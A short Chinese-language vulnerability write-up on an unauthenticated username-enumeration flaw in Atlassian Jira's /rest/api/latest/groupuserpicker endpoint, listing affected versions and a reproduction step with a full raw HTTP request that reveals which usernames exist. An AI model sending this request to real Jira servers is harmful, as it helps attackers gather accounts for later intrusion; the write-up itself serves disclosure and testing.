一、漏洞簡介
Atlassian Jira是澳大利亞Atlassian公司的一套缺陷跟蹤管理系統。該系統主要用於對工作中各類問題、缺陷進行跟蹤管理。 Atlassian Jira 8.4.0之前版本中的/rest/api/latest/groupuserpicker資源存在信息泄露漏洞。該漏洞源於網絡系統或產品在運行過程中存在配置等錯誤。未授權的攻擊者可利用漏洞獲取受影響組件敏感信息。
二、漏洞影響
Atlassian Jira 7.12< 受影響版本<8.4.0
三、復現過程
GET /rest/api/latest/groupuserpicker?query=admin&maxResults=50&showAvatar=false HTTP/1.1 Host: xx.xx.xx.xx User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Cookie: atlassian.xsrf.token=BYMG-3WIE-M348-K7SK|364a593b23b565fda3a6e6f3d2bfbb5f76232329|lout; JSESSIONID=4C42C8F054B1293DF3991F32C585C79A DNT: 1 Connection: close Upgrade-Insecure-Requests: 1
1、目標不存在的用戶進行請求,會返回一串json數據,說明找不到該用戶
2、但是當我以一個已知用戶身份測試時,會返回相應用戶的一些信息
3、這樣就造成了用戶名枚舉漏洞了